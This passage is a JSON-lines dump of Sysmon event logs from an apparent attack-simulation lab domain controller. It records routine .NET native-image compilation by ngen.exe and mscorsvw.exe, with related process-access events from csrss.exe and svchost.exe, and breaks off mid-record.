{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:19.053\r\nProcessGuid: {41C8662E-227A-5F25-0000-00101ABC0E00}\r\nProcessId: 2504\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9c8-0\\System.Data.OracleClient.dll\r\nCreationUtcTime: 2020-08-01 08:06:19.053","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:19.053","ProcessGuid":"{41C8662E-227A-5F25-0000-00101ABC0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9c8-0\\System.Data.OracleClient.dll","CreationUtcTime":"2020-08-01 08:06:19.053","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001082C00E00}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001082C00E00}","TargetProcessId":"2468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001082C00E00}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001082C00E00}","TargetProcessId":"2468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.116\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001082C00E00}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.116","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001082C00E00}","TargetProcessId":"2468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.553\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001075C50E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.553","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001075C50E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.553\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001075C50E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.553","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001075C50E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:19.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227B-5F25-0000-001075C50E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:19.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227B-5F25-0000-001075C50E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:21.163\r\nProcessGuid: {41C8662E-227B-5F25-0000-001075C50E00}\r\nProcessId: 4552\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c8-0\\System.Data.Services.dll\r\nCreationUtcTime: 2020-08-01 08:06:21.163","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:21.163","ProcessGuid":"{41C8662E-227B-5F25-0000-001075C50E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c8-0\\System.Data.Services.dll","CreationUtcTime":"2020-08-01 08:06:21.163","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.225\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.225","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Micr